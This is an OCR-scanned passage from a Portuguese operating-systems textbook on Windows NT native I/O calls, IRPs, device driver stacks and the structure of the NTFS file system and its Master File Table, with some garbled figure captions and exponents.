crição dos direitos de acesso solicitados, e dá ao criador 
de novos arquivos algum controle sobre como os blocos 
serão alocados. As chamadas NtReadFile e NtWriteFile 
recebem um descritor, buffer e tamanho de um arquivo. 
Elas também recebem um deslocamento explícito de ar- 
quivo e permitem que uma chave seja especificada para 
acessar intervalos de bytes travados em um arquivo. 
A maior parte dos parâmetros está relacionada com a 
especificação de qual dos métodos diferentes usar para 
reportar a conclusão da operação (talvez assincrona) de 
E/S, como descrito anteriormente. 

A chamada NtQueryDirectoryFile é um exemplo de 
um paradigma-padrão no executivo onde existem várias 
APIs de busca para acessar ou modificar informações 
sobre tipos específicos de objetos. Nesse caso, são os 
objetos de arquivo que se referem aos diretórios. Um 
parâmetro especifica que tipo de informação está sendo 
solicitado, como uma lista dos nomes no diretório ou 


(FIGURA 11.35] Chamadas API nativas do 


T para realizar E/S. 
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informações detalhadas sobre cada arquivo necessário 
para uma listagem estendida do diretório. Como isso é, 
na verdade, uma operação de E/S, todas as formas-pa- 
drão de reportar que a operação de E/S foi concluída são 
suportadas. A chamada NtQueryVolumelnformationFile 
é como a operação de busca de diretório, mas espera um 
descritor de arquivo que representa um volume aber- 
to que pode ou não conter um sistema de arquivos. Ao 
contrário dos diretórios, há parâmetros que podem ser 
modificados nos volumes e, por essa razão, há uma API 
separada, a NtSetVolumelnformationFile. 

A chamada NtNotifyChangeDirectoryFile é um 
exemplo de um paradigma interessante do NT. Os threads 
podem realizar E/S para determinar se quaisquer mu- 
danças ocorrem aos objetos (principalmente diretórios 
do sistema de arquivos, como neste caso, ou chaves do 
registro). Como a E/S é assíncrona, o thread retorna e 
continua; ele só é notificado depois, quando algo é mo- 
dificado. A solicitação pendente é posta na fila do sis- 
tema de arquivos como uma operação de E/S pendente 
usando um pacote de solicitação de E/S (IRP — I/O re- 
quest packet). As notificações são problemáticas quan- 
do se quer remover um volume do sistema de arquivos 
a partir do sistema, porque as operações de E/S estão 
pendentes. Logo, o Windows dá suporte a facilidades 
para cancelar operações pendentes, incluindo suporte 
no sistema de arquivos para desmontar, de maneira for- 
çada, um volume com E/S pendente. 





Chamada de sistema de E/S 


Descrição 





NtCreateFile 


Abre arquivos ou dispositivos novos ou existentes 





NtReadFile 


Lê a partir de um arquivo ou dispositivo 





NtWriteFile 


Grava em um arquivo ou dispositivo 





NtQueryDirectoryFile 


Solicita informações sobre um diretório, incluindo os arquivos 





NtQueryVolumelnformationFile 


Solicita informações sobre um volume 





NtSetVolumelnformationFile 


Modifica as informações de volume 





NtNotifyChangeDirectoryFile 


Concluída quando qualquer arquivo no diretório ou subdiretório é modificado 





NtQueryInformationFile 


Solicita informações sobre um arquivo 





NtSetlnformationFile 


Modifica as informações do arquivo 





NtLockFile 


Trava um intervalo de bytes em um arquivo 





NtUnlockFile 


Remove uma trava de intervalo 





NtFsControlFile 


Operações diversas em um arquivo 





NtFlushBuffersFile 


Descarrega para o disco os buffers de arquivo em memória 





NtCancelloFile 


Cancela operações de E/S pendentes em um arquivo 











NtDeviceloControlFile 


Operações especiais em um dispositivo 
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A chamada NtQueryInformationFile é a versão espe- 
cífica para arquivos da chamada de sistema para os dire- 
tórios. Ela tem uma chamada de sistema acompanhante, 
a NtSetlnformationFile. Essas interfaces acessam e mo- 
dificam todo tipo de informação sobre os nomes dos 
arquivos, características como encriptação, compacta- 
ção e dispersão e outros atributos e detalhes do arquivo, 
incluindo a pesquisa de seu ID interno ou a atribuição 
de um nome binário único (ID de objeto) a um arquivo. 

Essas chamadas de sistema são, na essência, uma 
forma da ioctl específica para arquivos. A operação Set 
pode ser usada para renomear ou apagar um arquivo. 
Entretanto, note que elas recebem descritores, não no- 
mes de arquivo; logo, um arquivo deve primeiro ser 
aberto antes de ser renomeado ou apagado. Elas tam- 
bém podem ser usadas para renomear fluxos de dados 
alternativos no NTFS (veja a Seção 11.8). 

As APIs separadas, NtLockFile e NtUnlockFile, exis- 
tem para configurar e remover travas de intervalo de 
bytes em arquivos. A NtCreateFile permite que o acesso 
a um arquivo inteiro seja restringido por meio do uso de 
um modo de compartilhamento. Uma alternativa são as 
APIs de travamento, que aplicam restrições de acesso 
obrigatórias a um intervalo de bytes no arquivo. Leitu- 
ras e gravações devem fornecer uma chave que combine 
com a chave fornecida para a NtLockFile com o objetivo 
de operar nos intervalos travados. 

Existem recursos semelhantes no UNIX, mas nele é 
arbitrário se as aplicações prestam atenção às travas de 
intervalo. A NtFsControlFile é muito parecida com as 
operações Query e Set anteriores, mas é uma operação 
mais genérica, com o objetivo de tratar operações es- 
pecíficas de arquivos que não combinam com as outras 
APIs. Por exemplo, algumas operações são específicas 
a um sistema de arquivos particular. 

Por fim, há chamadas diversas, como a NtFlushBuf- 
fersFile, que, como a chamada sync do UNIX, força 
a gravação de dados do sistema de arquivos no dis- 
co; a NtCancelloFile, para cancelar solicitações de E/S 
pendentes para um arquivo particular, e a NtDevicelo- 
ControlFile, que implementa operações ioctl para os 
dispositivos. A lista de operações é, na verdade, bem 
mais extensa. Há chamadas de sistema para apagar ar- 
quivos pelo nome e pesquisar os atributos de um arqui- 
vo específico — mas essas são apenas invólucros para 
as outras operações do gerenciador de E/S e não preci- 
sam realmente ser implementadas como chamadas de 
sistema separadas. Há também chamadas de sistema 
para tratar de portas de conclusão de E/S, um recurso 
de enfileiramento no Windows que ajuda servidores 
multithreaded a fazerem uso eficiente de operações 


assíncronas de E/S colocando os threads em estado de 
prontidão, por demanda, e reduzindo o número de tro- 
cas de contexto necessárias para servir E/S em threads 
dedicados. 


11.7.3 Implementação de E/S 


O sistema de E/S do Windows consiste em servi- 
ços plug-and-play, o gerenciador de energia do dispo- 
sitivo, o gerenciador de E/S e o modelo de driver de 
dispositivo. Os recursos plug-and-play detectam mu- 
danças na configuração do hardware e constroem ou 
destroem as pilhas de dispositivos para cada disposi- 
tivo, bem como causam o carregamento ou descarre- 
gamento dos drivers de dispositivos. O gerenciador de 
energia do dispositivo ajusta o estado de energia dos 
dispositivos de E/S para reduzir o consumo de energia 
do sistema quando os dispositivos não estão em uso. 
O gerenciador de E/S oferece suporte para manipular 
os objetos de E/S do núcleo, e operações baseadas em 
IRP, como loCallDrivers e loCompleteRequest, mas a 
maior parte do trabalho necessário para dar suporte à 
E/S do Windows é implementada pelos próprios dri- 
vers de dispositivos. 


Drivers de dispositivos 


Para garantir que os drivers de dispositivos funcio- 
nem bem com o resto do Windows, a Microsoft definiu 
o WDM (Windows Driver Model — modelo de dri- 
ver do Windows), com o qual os drivers de dispositi- 
vos devem estar em conformidade. O WDK (Windows 
Driver Kit — kit de driver do Windows) contém docu- 
mentação e exemplos para ajudar os desenvolvedores 
a produzir drivers em conformidade com o WDM. A 
maioria dos drivers do Windows começa copiando uma 
amostra apropriada de driver do WKD, que é então mo- 
dificada pelo escritor do driver. 

A Microsoft também oferece um verificador de 
driver que valida muitas das ações dos drivers para se 
assegurar de que eles estão em conformidade com os 
requisitos do WDM para estrutura e protocolos de soli- 
citações de E/S, gerenciamento de memória etc. O veri- 
ficador faz parte do sistema e os administradores podem 
controlá-lo executando verifier.exe, o que lhes permite 
configurar quais drivers devem ser verificados e quão 
extensa (ou seja, dispendiosa) a verificação deve ser. 

Mesmo com todo o suporte para desenvolvimento 
e verificação de driver, ainda é muito difícil escrever 
até mesmo drivers simples no Windows, de forma que 


a Microsoft construiu um sistema de invólucros chama- 
do de WDF (Windows Driver Foundation — Fun- 
damentos de driver do Windows), que é executado em 
cima do WDM e simplifica muitos dos requisitos mais 
comuns, a maioria relacionada com a interação correta 
com o gerenciador de energia do dispositivo e opera- 
ções plug-and-play. 

Para simplificar ainda mais a escrita de drivers, as- 
sim como aumentar a robustez do sistema, o WDF inclui 
a UMDF (User-Mode Driver Framework — Fra- 
mework para driver do modo usuário) para escrever dri- 
vers como serviços que são executados nos processos. 
E há a KMDF (Kernel-Mode Driver Framework — 
Framework para driver do modo núcleo) para escrever 
drivers como serviços que são executados no núcleo, 
mas tornando muitos detalhes do WDM “automágicos”. 
Como é o WDM que oferece o modelo de drivers por 
trás disso, é nele que focaremos nesta seção. 

Os dispositivos no Windows são representados por 
objetos de dispositivos, que também são usados para re- 
presentar hardware, como barramentos, e abstrações de 
software, como sistemas de arquivos, mecanismos de pro- 
tocolo de rede e extensões de núcleo, como drivers de filtro 
antivírus. Todos esses são organizados por meio da pro- 
dução do que o Windows chama de pilha de dispositivos, 
exibida anteriormente na Figura 11.14. 

As operações de E/S são inicializadas pelo geren- 
ciador de E/S chamando uma API do executivo, loCall- 
Driver, com ponteiros para o objeto de dispositivo no 
topo e para o IRP representando a solicitação de E/S. 
Essa rotina encontra o objeto de driver associado ao ob- 
jeto de dispositivo. Os tipos de operação especificados 
no IRP, de modo geral, correspondem às chamadas de 
sistema do gerenciador de E/S descritas anteriormente, 
como create, read e close. 


eN TEE Um único nível em uma pilha de dispositivos. 
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A Figura 11.36 apresenta os relacionamentos de um 
único nível da pilha de dispositivos. Para cada uma des- 
sas operações, um driver deve especificar um ponto de 
entrada. A chamada loCallDriver obtém o tipo de opera- 
ção do IRP, usa o objeto de dispositivo no nível atual da 
pilha de dispositivos para encontrar o objeto de driver 
e indexa a tabela de despacho de driver com o tipo de 
operação para encontrar o ponto de entrada correspon- 
dente para o driver. O driver é então chamado e recebe 
o objeto de dispositivo e o IRP. 

Uma vez que o driver tenha terminado o processa- 
mento da solicitação representada pelo IRP, ele tem três 
opções. Ele pode chamar loCallDriver mais uma vez, 
passando o IRP e o próximo objeto de dispositivo na 
pilha de dispositivos; pode declarar a conclusão da soli- 
citação de E/S e retornar a quem efetuou a chamada; ou 
pode pôr o IRP em fila internamente e retornar a quem 
efetuou a chamada, tendo declarado que a solicitação 
de E/S ainda está pendente. Esse último caso resulta em 
uma operação de E/S assíncrona, pelo menos se todos 
os drivers acima na pilha concordarem e também retor- 
narem a quem os chamou. 


Pacotes de solicitação de E/S 


A Figura 11.37 apresenta os campos principais do 
IRP. A parte inferior é um arranjo dimensionado de for- 
ma dinâmica contendo campos que podem ser usados 
por cada driver para a pilha de dispositivos que esteja 
tratando a solicitação. Esses campos de pilha também 
permitem que um driver especifique qual rotina cha- 
mar quando completar uma solicitação de E/S. Duran- 
te a conclusão, cada nível da pilha de dispositivos é 
visitado na ordem inversa e, por sua vez, a rotina de 
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Bele eye Os principais campos de um pacote de solicitação 
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conclusão atribuída por cada driver é chamada. A cada 
nível, o driver pode continuar a conclusão da solicita- 
ção ou decidir que tem mais trabalho a fazer e deixar a 
solicitação pendente, suspendendo a conclusão da E/S 
por enquanto. 

Quando está alocando um IRP, o gerenciador de E/S 
deve conhecer a profundidade da pilha de dispositivos 
em particular para que possa alocar um IRP suficiente- 
mente grande. Ele mantém o controle da profundidade 
da pilha em um campo em cada objeto de dispositivo 
conforme a pilha de dispositivos é formada. Note que 
não há definição formal de qual seja o próximo obje- 
to de dispositivo em pilha alguma. Essa informação é 
mantida em estruturas de dados privadas pertencentes 
ao driver anterior da pilha. Na verdade, a pilha nem 
precisa ser uma pilha; em qualquer camada um driver 
é livre para alocar novos IRPs, continuar a usar o IRP 
original, enviar uma operação de E/S para uma pilha de 
dispositivos diferente ou até mesmo alternar para um 
thread operário do sistema para continuar a execução. 

O IRP contém flags, um código de operação para 
indexação na tabela de despacho, ponteiros de buffers 
para, talvez, o buffer do núcleo e do usuário e uma lis- 
ta de MDLs (Nemory Descriptor Lists — Listas de 
descritores de memória), que são usadas para descrever 
as páginas físicas representadas pelos buffers, isto é, 
para operações de DMA. Há campos usados para ope- 
rações de conclusão e cancelamento. Os campos no IRP 
que são usados para enfileirar o IRP para dispositivos 
enquanto estiver em processamento são reutilizados 
quando a operação de E/S enfim termina de fornecer 
memória para o objeto de controle de APC usado para 
chamar a rotina de conclusão do gerenciador de E/S no 
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contexto do thread original. Existe também um campo 
de ligação usado para ligar todos os IRPs pendentes 
para o thread que os inicializou. 


Pilhas de dispositivos 


Um driver no Windows é capaz de fazer todo o traba- 
lho sozinho, como faz o driver de impressora da Figura 
11.38. Por outro lado, os drivers podem ser empilha- 
dos, o que significa que uma requisição pode passar por 
uma sequência de drivers, cada um fazendo uma parte 
do trabalho. Dois drivers empilhados são ilustrados na 
Figura 11.38. 

Um uso comum dos drivers empilhados é separar o 
gerenciamento do barramento do trabalho funcional de 
controlar o dispositivo. O gerenciamento do barramento 
PCI é muito complicado por causa dos diversos tipos de 
modos e transações de barramento. Separando esse tra- 
balho da parte específica do dispositivo, os escritores de 
drivers não precisam aprender como controlar o barra- 
mento: eles podem apenas usar o driver de barramento 
padrão em sua pilha. De maneira semelhante, os drivers 
USB e SCSI têm uma parte específica do dispositivo e 
outra parte genérica, e os drivers em comum são forne- 
cidos pelo Windows para a parte genérica. 

Outro uso de drivers empilhados é a capacidade de 
inserir drivers de filtro na pilha. Já vimos a utiliza- 
ção de drivers de filtro do sistema de arquivos, que são 
inseridos acima do sistema de arquivos. Eles também 
são usados para gerenciar o hardware físico. O driver 
de filtro realiza algumas transformações nas operações 
à medida que o IRP atravessa a pilha do dispositivo, 
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et tE] O Windows permite que os drivers sejam empilhados para funcionar com uma instância de dispositivo específica. O 
empilhamento é representado por objetos de dispositivos. 
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assim como durante a operação de conclusão com o IRP 
subindo a pilha através das rotinas de conclusão especi- 
ficadas por cada driver. Por exemplo, um driver de filtro 
poderia compactar os dados a caminho do disco ou en- 
criptar os dados a caminho da rede. Colocar o filtro aqui 
significa que nem a aplicação, nem o verdadeiro driver 
do dispositivo têm de estar cientes, e isso funciona de 
modo automático para todos os dados indo para o dispo- 
sitivo (ou vindo dele). 

Os drivers de dispositivos do modo núcleo são um 
problema grave para a estabilidade e confiabilidade do 
Windows. A maior parte das falhas do núcleo no Win- 
dows é causada por defeitos nos drivers de dispositivos. 
Como os drivers de dispositivos do modo núcleo dividem 
o mesmo espaço de endereçamento com as camadas do 
núcleo e executiva, defeitos existentes nos drivers podem 
corromper as estruturas de dados do sistema, ou pior. Al- 
guns desses defeitos são causados pelo número impres- 
sionante de drivers de dispositivos que existem para o 
Windows, ou pelo desenvolvimento de drivers por parte 
de programadores de sistema menos experientes. Os de- 
feitos também se devem ao grande número de detalhes 
envolvidos na escrita correta de drivers para o Windows. 


a 
Oh 


<> 


O modelo de E/S é poderoso e flexível, mas toda 
E/S é fundamentalmente assíncrona; logo, condições 
de corrida podem ser um risco. O Windows 2000 adi- 
cionou os recursos plug-and-play e o gerenciamento de 
energia dos sistemas Win9x para o Windows baseado 
no NT pela primeira vez. Isso coloca um grande núme- 
ro de requisitos sobre os drivers para lidarem de forma 
correta com os dispositivos indo e vindo, enquanto os 
pacotes de E/S estão no meio do seu processamento. 
Usuários de PCs desktop frequentemente conectam/ 
desconectam dispositivos, fecham as tampas e colocam 
notebooks em maletas e, de modo geral, não se preo- 
cupam se, por acaso, a pequena luz verde de atividade 
ainda está acesa. Escrever drivers de dispositivos que 
funcionem de forma correta nesse ambiente pode ser 
muito desafiador; por isso o WDF (Windows Driver 
Foundation) foi desenvolvido para simplificar o WDM 
(Windows Driver Model). 

Há muitos livros disponíveis sobre o Windows 
Driver Model e o novo Windows Driver Foundation 
(KANETKAR, 2008; ORWICK e SMITH, 2007; 
REEVES, 2010; VISCAROLA et al., 2007; e VOS- 
TOKOV, 2009). 
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11.8 O sistema de arquivos do 
Windows NT 


O Windows dá suporte a vários sistemas de arquivos, 
dos quais os mais importantes são FAT-16, FAT-32 e 
NTFS (NT File System — Sistema de arquivos do NT). 
O FAT16 é usado no antigo sistema de arquivos do MS- 
-DOS, que usa endereço de disco de 16 bits, o que o li- 
mita a partições de disco não maiores que 2 GB. Em sua 
maioria, é usado para acessar disquetes, pelos usuários 
que ainda os utilizam. O FAT-32 usa endereços de 32 bits 
e suporta partições de disco de até 2 TB. Não há segu- 
rança no FAT-32, e hoje ele só é de fato usado em mídias 
portáteis, como unidades flash. O NTFS é o sistema de 
arquivos desenvolvido de forma específica para a versão 
NT do Windows. Começando com o Windows XP, ele se 
tornou o sistema-padrão instalado pela maioria dos fabri- 
cantes de computador, aumentando bastante a segurança 
e a funcionalidade do Windows. O NTFS usa endereços 
de disco de 64 bits e pode (na teoria) suportar partições 
de disco de até 2% bytes, ainda que outras considerações 
o limitem a tamanhos menores. 

Nesta seção, examinaremos o sistema de arquivos 
NTFS, porque ele é um sistema de arquivos moderno, 
com muitas características interessantes e inovações no 
projeto. Ele é um sistema de arquivos grande e comple- 
xo, € limitações de espaço nos impedem de cobrir todas 
as suas características, mas o material apresentado a se- 
guir deve dar uma ideia razoável a respeito. 


11.8.1 Conceitos fundamentais 


Nomes de arquivos individuais no NTFS são limita- 
dos a 255 caracteres; caminhos completos são limitados 
a 32.767 caracteres. Os nomes de arquivos estão em Uni- 
code, permitindo que pessoas em países que não utili- 
zam o alfabeto latino (por exemplo, Grécia, Japão, Índia, 
Rússia e Israel) escrevam os nomes de arquivos em sua 
língua nativa. Por exemplo, gue é um nome de arquivo 
perfeitamente válido. O NTFS dá suporte total à diferen- 
ciação de letras maiúsculas e minúsculas (logo, algo é 
diferente de Algo e de ALGO). A API do Win32 não dá 
suporte completo a essa diferenciação de letras para os 
nomes de arquivos e nunca para os nomes de diretórios. 
Esse suporte existe quando executamos o subsistema 
POSIX com o objetivo de manter compatibilidade com 
o UNIX. O Win32 não diferencia letras maiúsculas e 
minúsculas, mas preserva o tipo usado; logo, os nomes 
de arquivos podem ter letras maiúsculas e minúsculas. 
Ainda que diferenciar letras maiúsculas de minúsculas 


seja uma característica muito familiar para os usuários do 
UNIX, é muito inconveniente para usuários comuns que 
não fazem essas distinções com frequência. Por exemplo, 
a internet é bastante insensível à diferenciação entre le- 
tras maiúsculas e minúsculas hoje. 

Um arquivo NTFS não é apenas uma sequência li- 
near de bytes, como são os arquivos do FAT-32 e do 
UNIX. Em vez disso, um arquivo consiste em vários 
atributos, cada qual representado por um fluxo de bytes. 
A maioria dos arquivos tem poucos fluxos curtos, como 
o nome do arquivo e seu ID de objeto de 64 bits, além 
de um fluxo longo (sem nome) com os dados. Contudo, 
um arquivo também pode ter dois ou mais fluxos de da- 
dos (longos). Cada fluxo tem um nome consistindo no 
nome do arquivo, dois pontos e o nome do fluxo, como 
em algo:fluxol. Cada fluxo tem seu próprio tamanho 
e pode ser travado de forma independente dos outros. 
A ideia de múltiplos fluxos em um arquivo não é nova 
no NTFS. O sistema de arquivos do Apple Macintosh 
usa dois fluxos por arquivo, o fork de dados e o fork de 
recursos. A primeira utilização de vários fluxos para o 
NTFS foi para permitir que um servidor de arquivos do 
NT atendesse a clientes do Macintosh. Os múltiplos flu- 
xos de dados também são usados para representar meta- 
dados sobre arquivos, como as miniaturas das imagens 
JPEG disponíveis na GUI do Windows. Entretanto, 
infelizmente, os múltiplos fluxos de dados são frágeis 
e, com frequência, perdem-se dos arquivos quando são 
transportados para outros sistemas de arquivos, trans- 
portados pela rede ou até mesmo quando guardados em 
um backup e depois recuperados, porque muitos utilitá- 
rios os ignoram. 

O NTFS é um sistema de arquivos hierárquico, similar 
ao sistema de arquivos do UNIX. O separador entre nomes 
de componentes é “Nº, em vez de “/’, um fóssil herdado 
dos requisitos de compatibilidade com o CP/M, quando o 
MS-DOS foi criado. Diferente do UNIX, os conceitos de 
diretório atual, referências estritas ao diretório atual (.) e 
ao diretório pai (..) são implementados como convenções, 
em vez de uma parte fundamental do projeto do sistema de 
arquivos. Referências estritas são aceitas, mas são usadas 
apenas para o subsistema POSIX, assim como o suporte 
do NTFS para checagem de permissão para percorrer dire- 
tórios (a permissão “x” no UNIX). 

No NTES, as ligações simbólicas são admitidas. A 
criação desse tipo de ligação normalmente é restrita aos 
administradores, para evitar problemas de segurança, 
como os ataques de spoofing, que foi o caso do UNIX 
quando da primeira introdução das ligações simbólicas 
na versão 4.2BSD. A implementação de ligações sim- 
bólicas utiliza um recurso do NTFS denominado ponto 


de reanálise (discutido mais adiante nesta seção). Além 
disso, também são suportados os recursos de compac- 
tação, criptografia, tolerância a falhas, uso do diário e 
arquivos esparsos. Essas características e suas imple- 
mentações serão discutidas em breve. 


11.8.2 Implementação do sistema de 
arquivos NTFS 


O NTFS é um sistema de arquivos muito complexo 
e sofisticado, desenvolvido especificamente para o NT 
como alternativa ao sistema de arquivos HPFS, que foi 
desenvolvido para o OS/2. Embora a maior parte do NT 
tenha sido projetada em terra firme, o NTFS é um recur- 
so único entre os componentes do sistema operacional, 
visto que a maior parte de seu projeto original foi reali- 
zada a bordo de um barco no Puget Sound (seguindo um 
protocolo estrito de trabalho na parte da manhã e cerveja 
na parte da tarde). A seguir, estudaremos vários de seus 
aspectos, começando por sua estrutura e depois passando 
para a busca de nome de arquivo, a compactação de ar- 
quivos, o uso de diário e a criptografia de arquivos. 


Estrutura do sistema de arquivos 


Cada volume do NTFS (por exemplo, a partição 
do disco) contém arquivos, diretórios, mapas de bits e 
outras estruturas de dados. Cada volume é organizado 
como uma sequência linear de blocos (“clusters”, na 
terminologia da Microsoft), com o tamanho do bloco 


ENTREE: Tabela de arquivos mestre do NTFS. 
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determinado para cada volume e variando de 512 bytes 
a 64 KB, dependendo do tamanho do volume. A maioria 
dos discos NTFS usa blocos de 4 KB como um tamanho 
que serve como ponto de equilíbrio entre blocos gran- 
des (para transferências eficientes) e blocos pequenos 
(para obter uma baixa fragmentação interna). Os blocos 
são referenciados por seus deslocamentos a partir do 
início do volume, usando-se números de 64 bits. 

A principal estrutura de dados de cada volume é a MFT 
(Master File Table — Tabela mestra de arquivos), que é 
uma sequência linear de registros com tamanho fixo de 1 
KB. Cada registro da MFT descreve somente um arquivo 
ou um diretório. O registro contém atributos do arquivo, 
como seu nome e sua estampa de tempo e a lista de en- 
dereços de disco onde seus blocos estão localizados. Se 
um arquivo for extremamente grande, algumas vezes será 
necessário usar dois ou mais registros da MFT para abrigar 
a lista de todos os blocos. Nesse caso, o primeiro registro 
da MFT, chamado de registro-base, aponta para os outros 
registros da MFT. Esse esquema de estouro nos remete de 
volta aos tempos do CP/M, no qual cada entrada de di- 
retório era chamada de extensão. Um mapa de bits faz o 
acompanhamento de quais entradas da MFT estão livres. 

A MFT é, em si, um arquivo e, como tal, pode ser 
colocada em qualquer lugar de um volume, eliminando 
assim o problema com setores defeituosos na primeira 
trilha. Além disso, o arquivo pode crescer o quanto for 
preciso, até um tamanho máximo de 2º registros. 

A MFT é mostrada na Figura 11.39. Cada registro 
da MFT constitui uma sequência de pares (cabeça- 
lho do atributo, valor). Cada atributo começa com um 
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cabeçalho que indica qual é o atributo e o tamanho do 
valor, pois alguns valores de atributos têm o tamanho 
variável, como o nome do arquivo e os dados. Se o va- 
lor do atributo for suficientemente curto para caber em 
um registro da MFT, ele será colocado lá. Se for mui- 
to grande, será colocado em outro lugar do disco e um 
ponteiro para ele será inserido no registro da MFT. Isso 
torna o NTFS bastante eficiente para arquivos peque- 
nos, ou seja, aqueles que se encaixam no próprio regis- 
tro da MFT. 

Os primeiros 16 registros da MFT sao reservados 
para os arquivos de metadados do NTFS, conforme 
ilustra a Figura 11.39. Cada um dos registros descreve 
um arquivo normal que tem atributos e blocos de dados, 
como qualquer outro arquivo. Cada um desses arquivos 
tem um nome que começa com um cifrão, para indicar 
que é um arquivo de metadados. O primeiro registro 
descreve o próprio arquivo da MFT. Ele indica, em par- 
ticular, onde os blocos da MFT estão, para que o sistema 
tenha condições de encontrá-lo. Obviamente, o Windows 
precisa de uma maneira de encontrar o primeiro bloco 
do arquivo da MFT, para então achar o restante da in- 
formação sobre o sistema de arquivos. Ele encontra o 
primeiro bloco do arquivo da MFT a partir da verifica- 
ção do bloco de inicialização (boot), onde seu endereço 
é definido no momento de instalação do sistema. 

O registro 1 é uma cópia da primeira parte do ar- 
quivo da MFT. Essa informação é tão preciosa que ter 
uma segunda cópia pode ser absolutamente necessário, 
no caso de ocorrerem defeitos nos primeiros blocos da 
MFT. O registro 2 é o arquivo de registro de eventos 
(log). Quando ocorrem mudanças estruturais no sistema 
de arquivos — como adicionar um novo diretório ou 
remover um diretório existente —, a ação é registrada 
nesse arquivo antes de ser realizada, a fim de aumentar 
a probabilidade de uma recuperação correta, na ocor- 
rência de uma falha durante a operação, tal como um 
travamento do sistema. As mudanças nos atributos de 
arquivos também são registradas nesse arquivo. Na ver- 
dade, as únicas mudanças que não são registradas no log 
são as que ocorrem nos dados do usuário. O registro 3 
contém informações sobre o volume, como seu tama- 
nho, sua etiqueta de identificação e sua versão. 

Conforme mencionado anteriormente, cada registro 
da MFT contém uma sequência de pares (cabeçalho do 
atributo, valor). No arquivo $AttrDef é que estão de- 
finidos os atributos. A informação sobre esse arquivo 
encontra-se no registro 4 da MFT. Depois vem o diretó- 
rio-raiz, que também é um arquivo e que pode crescer 
para um tamanho qualquer. Ele fica descrito no registro 
5 da MFT. 


O espaço livre do volume é controlado por um mapa 
de bits, que também é um arquivo, e seus atributos e 
endereços de disco ficam no registro 6 da MFT. O pró- 
ximo registro da MFT aponta para o arquivo de carga 
de inicialização. O registro 8 é usado para ligar todos 
os blocos defeituosos e assegurar que eles nunca farão 
parte de um arquivo. O registro 9 contém a informação 
sobre segurança. O registro 10 é usado para o mapea- 
mento de letras maiúsculas e minúsculas. Para as letras 
latinas, esse mapeamento de A a Z é óbvio (pelo me- 
nos para as pessoas que utilizam esse alfabeto). Para 
outros idiomas, como grego, armênio ou georgiano, isso 
é menos óbvio; assim, o arquivo mostra como se faz 
esse mapeamento. Por fim, o registro 11 é um diretório 
que contém diversos arquivos para coisas como cotas 
de disco, identificadores de objetos, pontos de reanálise 
e assim por diante. Os últimos quatro registros da MFT 
são reservados para uso futuro. 

Cada registro da MFT consiste em um cabeçalho do 
registro, seguido por uma sequência de pares (cabeça- 
lho do atributo, valor). O cabeçalho do registro contém: 
um número mágico usado para verificar sua validade, 
um número sequencial atualizado a cada vez que o re- 
gistro é reutilizado por um novo arquivo, um contador 
de referências ao arquivo, o número de bytes realmente 
usados no registro, o identificador (índice, número se- 
quencial) do registro-base (usado somente para regis- 
tros de extensão) e alguns outros campos diversos. 

O NTFS define 13 atributos que podem aparecer 
nos registros da MFT. Esses atributos são apresentados 
na Figura 11.40. Cada cabeçalho de atributo identifica 
o atributo e indica o tamanho e a localização do campo 
de valor junto com diversos flags e outras informações. 
Em geral, os valores do atributo ficam logo após seus 
cabeçalhos, mas, se um valor for tão grande que não 
caiba no registro da MFT, ele poderá ser colocado em 
um bloco de disco separado. Esse atributo é chamado 
de atributo não residente. O atributo de dados é um 
candidato óbvio a ser não residente. Alguns atributos, 
como os nomes, podem ser repetidos, mas todos os atri- 
butos devem aparecer em uma determinada ordem no 
registro da MFT. Os cabeçalhos de atributos residentes 
têm 24 bytes; os de atributos não residentes são maio- 
res porque contêm informação sobre onde encontrar o 
atributo no disco. 

O campo de informação padrão contém o proprietá- 
rio do arquivo, informações sobre segurança, estampas 
de tempo exigidas pelo POSIX, contador de ligações 
estritas, bits que indicam que o arquivo é somente lei- 
tura, arquivamento etc. Esse é um campo de tamanho 
fixo e obrigatório. O nome do arquivo é um campo em 
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eE Os atributos usados nos registros da MFT. 





Atributo 


Descrição 





Informação-padrão 


Bits de flag, estampas de tempo etc. 





Nome do arquivo 


Nome do arquivo em Unicode; pode ser repetido para nome MS-DOS 





Descritor de segurança 


Obsoleto. A informação de segurança agora fica em $Extend$Secure 





Lista de atributos 


Localização dos registros adicionais da MFT, se necessário 





ID do objeto 


Identificador de arquivos de 64 bits, único para este volume 





Ponto de reanálise 


Usado para montagens e ligações simbólicas 





Nome do volume 


Nome deste volume (usado somente em $Volume) 





Informação sobre o volume 


Versão do volume (usado somente em $Volume) 





Raiz de índice 


Usado para diretórios 





Alocação de índice 


Usado para diretórios muito grandes 





Mapa de bits 


Usado para diretórios muito grandes 





Fluxo de utilitários de registro 


Controla registro de eventos no $LogFile 





Dados 


Fluxo de dados; pode ser repetido 














Unicode e de tamanho variável. Para tornar os arquivos 
com nomes que não sejam do tipo MS-DOS acessíveis 
aos programas antigos de 16 bits, os arquivos podem 
dispor de um nome curto 8 + 3 do MS-DOS. Se o nome 
real do arquivo se encaixar na regra 8 + 3 do MS-DOS, 
o nome secundário do MS-DOS não será utilizado. 

No NT 4.0, a informação sobre segurança podia ser 
colocada em um atributo, mas no Windows 2000 e nas 
versões superiores, essa informação fica em um único 
arquivo, para que vários arquivos possam compartilhar 
as mesmas descrições de segurança. Isso resulta em 
uma economia significativa de espaço na maioria dos 
registros da MFT e no sistema de arquivos inteiro, pois 
as informações de segurança para muitos dos arquivos 
de propriedade de usuários diferentes são idênticas. 

A lista de atributos é necessária para o caso de os 
atributos não caberem no registro da MFT. Esse atribu- 
to indica onde encontrar os registros de extensão. Cada 
entrada da lista contém um índice de 48 bits, na MFT, 
indicando onde o registro de extensão está e um número 
sequencial de 16 bits para conferir o pareamento entre o 
registro de extensão e registros-base. 

Os arquivos do NTFS possuem um ID associado 
que é semelhante ao número do i-node no UNIX. Os 
arquivos podem ser abertos pelo ID, mas os IDs atri- 
buídos pelo NTFS nem sempre são úteis quando o ID 
deve persistir, pois ele é baseado no registro MTF e 
pode ser alterado se o registro para o arquivo for movido 
(por exemplo, se o arquivo for restaurado a partir de um 
backup). O NTFS permite um atributo de ID de objeto 


separado, que pode ser configurado em um arquivo e 
nunca precisa ser alterado. Ele pode ser mantido com o 
arquivo, caso este seja copiado para um novo volume, 
por exemplo. 

O ponto de reanálise diz ao procedimento de análise 
sintática do nome do arquivo para fazer algo especial. 
Esse mecanismo é utilizado para montagem de sistemas 
de arquivos e ligações simbólicas. Os dois atributos de 
volume são usados somente para identificação do vo- 
lume. Os próximos três atributos lidam com o modo 
como os diretórios são implementados. Os pequenos 
são apenas listas de arquivos, mas os grandes são im- 
plementados usando-se árvores B+. O atributo de fluxo 
